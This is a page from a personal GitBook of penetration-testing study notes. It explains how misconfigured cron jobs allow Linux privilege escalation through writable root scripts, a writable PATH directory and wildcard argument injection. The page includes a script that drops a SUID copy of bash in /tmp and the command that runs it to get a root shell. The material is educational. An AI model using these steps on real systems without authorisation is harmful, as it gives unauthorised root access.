FValkyrie_17's Infosec Notes
  • 1nf05EC N0TE5
  • Networking and Network Security
    • Security Models
    • Host Discovery
    • Port Scanning - Service and OS Discovery
    • Port Scanning - Common Firewall and IDS Evasion
    • Naming/Name Service and Directory Service
    • DNS
      • DNS Basics
      • DNS Pentest
    • NetBIOS
      • NetBIOS Basics
      • NetBIOS Pentest
    • BGP(Border Gateway Protocol) and AS Numbers (Autonomous System Numbers)
    • MS-RPC (Remote Procedure Call)
    • SMB (Server Message Block)
      • Basics of SMB
      • SMB Pentesting
    • LDAP (Lightweight Directory Access Protocol)
      • LDAP Working
      • LDAP Exploitation
    • RDP (Remote Desktop Protocol) and VNC (Virtual Network Computing)
    • Telnet (Teletype Network Protocol)
    • FTP (File Transfer Protocol)
    • NFS (Network File System)
    • SSH (Secure Socket Shell)
      • Port Forwarding Primer
    • SQL servers
      • MS-SQL (Microsoft SQL Service)
      • MySQL
    • Hydra Cheat Sheet
    • SMTP
    • SLP (Service Location Protocol)
    • SNMP
      • SNMP Basics
      • SNMP Pentest
    • NTP
    • File Transfer Primers
    • Regex 101
  • Make your dumb netcat shell interactive and awesome
  • Metasploit Primer
    • Important Terminologies
    • Working with Metasploit Database
  • Reverse Engineering 101
    • x86-64 assembly tutorial
      • Introduction to x86-64
  • Web Application Security
    • Security Policies
      • Same Origin Policy
      • Security Headers
        • CSP (Content Security Policy)
        • HSTS (Strict-Transport-Security Header)
        • X-Content-Type-Options
        • X-Frame-Options
        • Referrer-Policy
    • Authentication Bypass
  • Linux Privilege Escalation
    • Permissions in Linux
    • Enumeration
    • Using files with SUID/SGID permission set
    • Using Kernel Exploits
    • Using Service Exploits
    • Exploiting Weak File Permissions
    • Exploiting Sudo
    • Cron Jobs
  • windows privilege escalation
    • Windows Basics
    • PsTools Primer
    • Persistence Techniques
  • Android application security testing
    • Setting it Up
      • Installing Android SDK and emulator
      • Setting up Frida-Server on Android Device
  • HTB writeups
    • Archetype (HTB Starting Point 2x1)
    • Oopsie (HTB Starting Point 2x2)
    • Lame
    • Jerry
  • THM writeups
    • Vulnuniversity
  • Preparation Notes
    • CEH Practical Prep Notes
Powered by GitBook
On this page
  • Format of a Cron job
  • Exploiting File Permission Misconfigurations
  • PATH Environment Variable
  • Wildcards

Was this helpful?

  1. Linux Privilege Escalation

Cron Jobs

Exploiting cron jobs for privilege escalation

Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs.

User crontabs are usually stored in /var/spool/cron or /var/spool/cron/crontabs/.

The system-wide crontab is located at /etc/crontab.

Cron jobs run with security level of user who owns them. by default cron jobs run with /bin/sh shell with limited environment variables.

Format of a Cron job

Cron jobs exist in a certain format, being able to read that format is important if you want to exploit a cron job. 

# = ID
m = Minute
h = Hour
dom = Day of the month
mon = Month
dow = Day of the week
user = What user the command will run as

command = What command should be run

Format:
#  m   h dom mon dow user  command

Eg:
17 *   1  *   *   *  root  cd / && run-parts --report /etc/cron.hourly

Exploiting File Permission Misconfigurations

Misconfiguration of file permissions associated with cron jobs can be utilized for privilege escalation.

Example: For the following cron jobs we can see that a overwrite.sh file has been scheduled by the root user.

user@debian:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh

Here the overwrite.sh file can be modified if the file is world writable

user@debian:~$ ls -la /usr/local/bin/overwrite.sh
-rwxr--rw- 1 root staff 40 May 13  2017 /usr/local/bin/overwrite.sh

We can modify it to a reverse shell comand and open a listener at the attacker terminal and get a privileged shell access.

PATH Environment Variable

The crontab PATH environment variable is by default set to /usr/bin:/bin.

The PATH variable can be overwritten in a crontab file. If a cron job script/program does not use an absolute path, and, one of the directories in the PATH variable is writable by user, a script/program with same name as the one in the cron job can be created for privilege escalation.

Example: Considering the following dump from /etc/crontab file, the PATH variable has /home/user in it. 

user@debian:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh

So the "user" user can create a new script named overwrite.sh with the following content and make it executable for gaining a privileged shell access.

#!/bin/bash

cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash

PS: Wait for the cron job to run (should not take longer than a minute). Run the /tmp/rootbash command with -p to gain a shell running with root privileges:

/tmp/rootbash -p

Wildcards

When a wildcard character (*) is provided to a command as part of an argument, the shell will first perform filename expansion (also known as globbing) on the wildcard. This process replaces the wildcard with a space-separated list of the file and directory names in the current directory.

Since file systems in Linux are generally very permissive with filenames, and filename expansion happens before the command is executed, it is possible to pass command line options (e.g. -h, —-he|p) to commands by creating files with these names.

The following commands should show how this works:

$ ls *
$ touch ./-l
$ ls *

Filenames are not simply restricted to simple options like -h or --he|p. In fact we can create filenames that match complex options: --option=key=value

GTFOBins can help determine whether a command has command line options which will be useful for our purposes.

For binaries which allow other commands to be run with a flag (can be found with GTFOBins), if they are being run by a root/higher privileged user configured cron job scheduled script with *, we can drop a payload (named as the command execution flag of that specific binary) in a directory of the PATH variable value and get it executed.

PreviousExploiting SudoNextWindows Basics

Last updated 5 months ago

Was this helpful?